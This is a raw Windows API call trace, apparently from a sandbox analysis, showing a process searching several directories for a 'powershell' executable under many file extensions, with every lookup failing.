	[0325.413] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.356] SetErrorMode (uMode=0x1) returned 0x1
	[0326.357] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.357] SetErrorMode (uMode=0x1) returned 0x1
	[0326.357] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.365] SetErrorMode (uMode=0x1) returned 0x1
	[0326.366] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.366] SetErrorMode (uMode=0x1) returned 0x1
	[0326.366] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.373] SetErrorMode (uMode=0x1) returned 0x1
	[0326.374] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.374] SetErrorMode (uMode=0x1) returned 0x1
	[0326.374] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.381] SetErrorMode (uMode=0x1) returned 0x1
	[0326.382] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.382] SetErrorMode (uMode=0x1) returned 0x1
	[0326.382] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.390] SetErrorMode (uMode=0x1) returned 0x1
	[0326.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.391] SetErrorMode (uMode=0x1) returned 0x1
	[0326.391] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.392] SetErrorMode (uMode=0x1) returned 0x1
	[0326.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.392] SetErrorMode (uMode=0x1) returned 0x1
	[0326.392] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.392] SetErrorMode (uMode=0x1) returned 0x1
	[0326.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.393] SetErrorMode (uMode=0x1) returned 0x1
	[0326.393] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.393] SetErrorMode (uMode=0x1) returned 0x1
	[0326.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.393] SetErrorMode (uMode=0x1) returned 0x1
	[0326.393] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.393] SetErrorMode (uMode=0x1) returned 0x1
	[0326.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.394] SetErrorMode (uMode=0x1) returned 0x1
	[0326.394] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.394] SetErrorMode (uMode=0x1) returned 0x1
	[0326.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.394] SetErrorMode (uMode=0x1) returned 0x1
	[0326.394] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.394] SetErrorMode (uMode=0x1) returned 0x1
	[0326.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.395] SetErrorMode (uMode=0x1) returned 0x1
	[0326.395] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.395] SetErrorMode (uMode=0x1) returned 0x1
	[0326.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.395] SetErrorMode (uMode=0x1) returned 0x1
	[0326.396] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.396] SetErrorMode (uMode=0x1) returned 0x1
	[0326.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.396] SetErrorMode (uMode=0x1) returned 0x1
	[0326.396] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.396] SetErrorMode (uMode=0x1) returned 0x1
	[0326.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.397] SetErrorMode (uMode=0x1) returned 0x1
	[0326.397] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.397] SetErrorMode (uMode=0x1) returned 0x1
	[0326.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.397] SetErrorMode (uMode=0x1) returned 0x1
	[0326.398] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.398] SetErrorMode (uMode=0x1) returned 0x1
	[0326.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.398] SetErrorMode (uMode=0x1) returned 0x1
	[0326.398] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.398] SetErrorMode (uMode=0x1) returned 0x1
	[0326.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.399] SetErrorMode (uMode=0x1) returned 0x1
	[0326.399] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.399] SetErrorMode (uMode=0x1) returned 0x1
	[0326.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.399] SetErrorMode (uMode=0x1) returned 0x1
	[0326.399] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.400] SetErrorMode (uMode=0x1) returned 0x1
	[0326.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.400] SetErrorMode (uMode=0x1) returned 0x1
	[0326.400] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.400] SetErrorMode (uMode=0x1) returned 0x1
	[0326.400] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.400] SetErrorMode (uMode=0x1) returned 0x1
	[0326.400] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.401] SetErrorMode (uMode=0x1) returned 0x1
	[0326.401] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.401] SetErrorMode (uMode=0x1) returned 0x1
	[0326.401] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.401] SetErrorMode (uMode=0x1) returned 0x1
	[0326.401] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.401] SetErrorMode (uMode=0x1) returned 0x1
	[0326.402] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.244] SetErrorMode (uMode=0x1) returned 0x1
	[0327.244] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.245] SetErrorMode (uMode=0x1) returned 0x1
	[0327.245] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.245] SetErrorMode (uMode=0x1) returned 0x1
	[0327.245] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.245] SetErrorMode (uMode=0x1) returned 0x1
	[0327.245] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.246] SetErrorMode (uMode=0x1) returned 0x1
	[0327.246] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.246] SetErrorMode (uMode=0x1) returned 0x1
	[0327.246] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.246] SetErrorMode (uMode=0x1) returned 0x1
	[0327.246] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.246] SetErrorMode (uMode=0x1) returned 0x1
	[0327.246] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.247] SetErrorMode (uMode=0x1) returned 0x1
	[0327.247] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.247] SetErrorMode (uMode=0x1) returned 0x1
	[0327.247] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.247] SetErrorMode (uMode=0x1) returned 0x1
	[0327.247] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.248] SetErrorMode (uMode=0x1) returned 0x1
	[0327.248] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.248] SetErrorMode (uMode=0x1) returned 0x1
	[0327.248] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.248] SetErrorMode (uMode=0x1) returned 0x1
	[0327.248] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c9cde80 | out: lpFindFileData=0x1c9cde80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.248] SetErrorMode (uMode=0x1) returned 0x1
	[0327.249] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9cdce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.249] SetErrorMode (uMode=0x1) returned 0x1
